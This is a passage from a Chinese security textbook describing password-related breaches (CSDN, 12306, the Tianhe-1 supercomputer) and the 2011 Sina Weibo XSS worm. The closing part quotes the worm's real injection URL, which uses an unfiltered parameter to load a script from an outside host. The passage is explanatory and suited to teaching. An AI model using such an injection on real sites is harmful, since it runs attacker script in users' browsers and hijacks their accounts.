2.3 安全事件敲响警钟

2.3.1  CSDN事件

2011年12月21日上午,有骇客在网上披露CSDN数据库泄露,并提供了下载地址,高达600余万个注册邮箱与密码泄露,并且所有密码都使用明文储存。CSDN是国内最大的以程序员为核心的大型网站,却采用明文储存用户密码(当时即便是小型BBS网站数据库都采用MD5等方式对密码加密)。

21日晚,CSDN发布声明并道歉。据CSDN官方解释,该数据库为CSDN作为备份所用,CSDN在2009年4月之前是以明文保存密码,而泄漏原因不详。

继CSDN的数据库泄漏之后,天涯社区、世纪佳缘、开心网等十余家国内知名网站的近5000万用户信息陆续在网上被人公布,各大社区的信誉也遭受质疑。当然,这次严重的事故同时也提高了国内对网络信息安全的重视。

2.3.2  12306事件

2014年12月25上午,乌云漏洞报告平台上出现了一则标题为“大量12306用户数据在互联网疯传,包括用户账号、明文密码、身份证号码、邮箱等(泄漏途径目前未知)”的新闻,缺陷编号为:WooYun-2014-88532。这可让网上一下炸了锅,各种讨论与分析瞬间出炉,根据对泄漏数据的分析及当晚的官方信息,这次事件极有可能是一次“撞库攻击”。那么何谓“撞库”?就拿刚才提到的CSDN数据泄露来说,攻击者如果用这些泄露的数据尝试登录12306网站,或是编写脚本进行大量登录测试,就叫撞库攻击。然而被泄露的数据远不止CSDN这么多,量变引起质变,多米诺骨牌效应导致了大量数据的泄露。

2.3.3  “天河”超级计算机事件

2015年2月12日,又一个神奇的漏洞引起了广泛关注,这个漏洞竟然出现在超级计算机天河一号上,着实令人震惊(图2-4)。但是仔细一看漏洞细节,却又让人啼笑皆非:天河一号的办公环境有一个未加密的无线网络,任何设备都可以轻易接入,直接进入内网。这位白帽子小黑客顺便找了找其他可能存在的漏洞,这一找可不得了,他发现天河一号超级计算机内部存在大量弱口令,以及部分服务器存在破壳漏洞(即bash漏洞,一个十分严重的Linux漏洞)。

图2-4 天河一号漏洞信息

回顾以上列举的3个典型安全事件,其都与密码安全息息相关,也正好对应了密码安全中3个“过不去的坎”:明文存储、撞库(同一密码多用)和弱口令。更多关于密码安全的知识,请见附录。

2.3.4 新浪微博XSS蠕虫事件

2011年6月28日晚,中国大型SNS网站——新浪网的新浪微博业务遭受XSS蠕虫攻击。中招的微博博主会自动通过广播和私信的方式发布一些诱惑性信息,用户单击链接后便会触发XSS,发布同样的信息并自动关注hellosamy,中招的用户单击后又会触发XSS,蠕虫便如链式反应般传播。由于蠕虫的指数爆炸型传播、微博的分享形式以及一些大V认证的用户被攻击,该蠕虫在16分钟内就感染了30 000名以上用户,可以说是近几年中国SNS社区受到的最大的一次攻击。

这次攻击并没有直接造成用户的重大损失,更像是一场黑客的恶作剧(从收听的hellosamy用户也能看出,Samy是XSS蠕虫鼻祖herosamy的作者,他的XSS蠕虫曾造成社交网站MySpace的瘫痪)。但同样,这次事件也提高了公众对信息安全的关注(随后新浪多处反射型XSS被披露)。而这次漏洞成因更让人大跌眼镜:新浪对该参数竟然完全没有过滤!这次攻击在Chrome、Safari中会被XSS Filter拦截,而IE、Firefox未能幸免,根据当时IE、Firefox的市场占有率,这的确是一次范围很广的攻击。

让我们来分析一下这个被用来传播XSS蠕虫的URL:

    http://weibo.com/pub/star/g/xyyyd”><script src=//www.2kt.cn/images/
t.js></script>?type=update

在访问这个URL时,新浪会对字符串进行处理,结果变成了访问:

    http://weibo.com/pub/star.php?g=xyyyd”><script src=//www.2kt.cn/
images/t.js></script>?type=update

由于参数g并没有进行应有的过滤,导致这个来自外部的JS脚本被嵌入页面内。